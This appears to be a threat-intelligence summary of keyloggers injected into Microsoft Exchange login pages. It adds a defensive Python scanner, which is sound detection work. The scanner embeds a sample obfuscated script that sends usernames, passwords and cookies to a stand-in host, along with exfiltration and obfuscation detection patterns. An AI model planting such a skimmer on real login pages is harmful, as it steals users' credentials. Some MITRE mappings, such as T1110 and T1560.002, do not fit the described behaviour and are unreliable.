In May 2024 and continuing into 2025, keyloggers were found injected into Microsoft Exchange Server login pages, capturing user credentials by either saving data locally or sending it to external servers. The attacks impacted over 65 victims across 26 countries, with government organizations being heavily targeted. #MicrosoftExchange #Keylogger #PositiveTechnologies
Key points
- Malicious code was injected into Microsoft Exchange Server login pages to capture user credentials through two main types of keyloggers: local logging and remote exfiltration.
- Local logging keyloggers save stolen credentials to files on the server accessible externally without using command and control servers, aiding stealth.
- Remote keyloggers send data immediately to external servers via methods like HTTP POST/GET, Telegram bots, Discord, and DNS tunneling.
- The attackers targeted servers in 26 countries, with the majority of compromised servers belonging to government entities, as well as IT, industrial, and logistics sectors.
- Exploitation of known Microsoft Exchange vulnerabilities likely facilitated many attacks, though some compromised servers did not have known vulnerabilities.
- Obfuscated JavaScript code was used to evade detection, and stolen data sometimes included cookies and User-Agent headers.
- Recommendations include vulnerability management, using web application protection tools, SIEM/EDR solutions, integrity checks, YARA scanning, and retrospective compromise assessments.
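As an added illustration of the integrity-check and scanning recommendations above (example code, not from Positive Technologies or the source report), the Python below compares Exchange authentication pages against a known-good SHA-256 baseline and flags inline scripts that read the logon form fields and call a network API or external URL, or that collect cookies and the User-Agent. The page fragments and the exfiltration hostname are constructed samples, not indicators from the report.

```python
"""Heuristic checks for injected credential-harvesting script in Exchange OWA auth pages."""
import hashlib
import re

# Constructed sample: a minimal clean logon.aspx fragment (not a real Exchange page).
CLEAN_PAGE = """<form action="/owa/auth.owa" method="POST" name="logonForm">
<input id="username" name="username" type="text" />
<input id="password" name="password" type="password" />
<script type="text/javascript" src="/owa/auth/scripts/premium/flogon.js"></script>
</form>"""

# Constructed sample mimicking the behaviour described in the report: an appended inline
# script that reads the form fields and sends them, plus cookie and User-Agent, to a remote host.
INJECTED_PAGE = CLEAN_PAGE + """
<script>
var _0x1a=document.getElementById('username').value,_0x2b=document.getElementById('password').value;
fetch('https://exfil.example.invalid/c?u='+_0x1a+'&p='+_0x2b+'&c='+document.cookie+'&ua='+navigator.userAgent);
</script>"""

INLINE_SCRIPT = re.compile(r"<script(?![^>]*\bsrc=)[^>]*>(.*?)</script>", re.I | re.S)
FORM_FIELDS = re.compile(r"\b(username|password|passwd|pwd)\b|logonForm", re.I)
EXFIL_API = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon|new\s+Image)\b|https?://", re.I)
CONTEXT = re.compile(r"document\.cookie|navigator\.userAgent", re.I)
OBFUSCATION = re.compile(r"_0x[0-9a-f]{2,}|\\x[0-9a-f]{2}|\beval\(|\batob\(|fromCharCode", re.I)

def scan_page(html: str) -> list[str]:
    """Return one finding per inline <script> block that looks like an injected keylogger."""
    findings = []
    for i, body in enumerate(INLINE_SCRIPT.findall(html)):
        reasons = []
        if FORM_FIELDS.search(body) and EXFIL_API.search(body):
            reasons.append("reads logon fields and calls a network API or external URL")
        if CONTEXT.search(body):
            reasons.append("collects document.cookie or navigator.userAgent")
        if OBFUSCATION.search(body):
            reasons.append("obfuscation markers (_0x identifiers, eval/atob/fromCharCode)")
        if reasons:
            findings.append(f"inline script #{i}: " + "; ".join(reasons))
    return findings

def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()

def integrity_check(current: dict[str, str], baseline: dict[str, str]) -> list[str]:
    """Return auth-page paths whose hash differs from the baseline or that the baseline lacks."""
    return sorted(p for p, content in current.items() if baseline.get(p) != sha256_hex(content))

# Baseline taken from a known-good deployment; 'lo.aspx' is an unexpected extra page (constructed).
BASELINE = {"/owa/auth/logon.aspx": sha256_hex(CLEAN_PAGE)}
CURRENT_FILES = {"/owa/auth/logon.aspx": INJECTED_PAGE, "/owa/auth/lo.aspx": "<% Response.Write(1) %>"}
```

Run `integrity_check(CURRENT_FILES, BASELINE)` first to find modified or unexpected pages, then `scan_page` on each flagged file to see why it was flagged.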
MITRE Techniques
- [T1056.001] Input Capture: Keylogging – Malicious JavaScript code was injected into Microsoft Exchange login pages to capture user credentials via form input processing (‘…malicious JavaScript code reads and processes the data from the authentication form…’).
- [T1071.001] Application Layer Protocol: Web Protocols – Collected credential data was sent using HTTP POST/GET requests and DNS tunneling to external servers (‘…data could be sent as parameters in a GET request…using a DNS tunnel…’).
- [T1110] Brute Force – Although not explicitly mentioned in the source, the exploitation of Exchange Server vulnerabilities to gain initial access suggests credential-access methods (‘…exploiting these vulnerabilities could have been one of the attack vectors…’).
- [T1140] Deobfuscate/Decode Files or Information – Attackers used obfuscated JavaScript code to hide malicious logic (‘Obfuscation of malicious code…example of deobfuscated code…’).
- [T1074] Data Staged – Keyloggers stored stolen credentials in local files accessible externally for later retrieval (‘…writes the data to a file on the server accessible from an external network…’).
- [T1560.002] Archive Collected Data: Archive via Web Service – Use of Telegram bots and legitimate services such as Discord to exfiltrate data (‘…a dedicated server, a Telegram bot, or other legitimate services (such as Discord) can be used…’).
Indicators of Compromise
- [File Paths] Suspicious modified authentication pages – C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\logon.aspx and related pages such as /owa/auth/lo.aspx and /owa/auth/getidtokens.aspx.
- [File Hashes] Malicious JavaScript code samples – Several unidentified hashes related to injected keylogger scripts (examples not provided, referenced as “and 2 more hashes”).
- [Network Indicators] External server URLs and Telegram bot channels used for data exfiltration – endpoints like /owa/auth/logon.aspx and Telegram bot identifiers (redacted in source).
- [YARA Rules] Detection signature for injected keyloggers – rule PTESCexploitwinZZExchangeKeyloggerJavascript for scanning suspicious Exchange authentication files.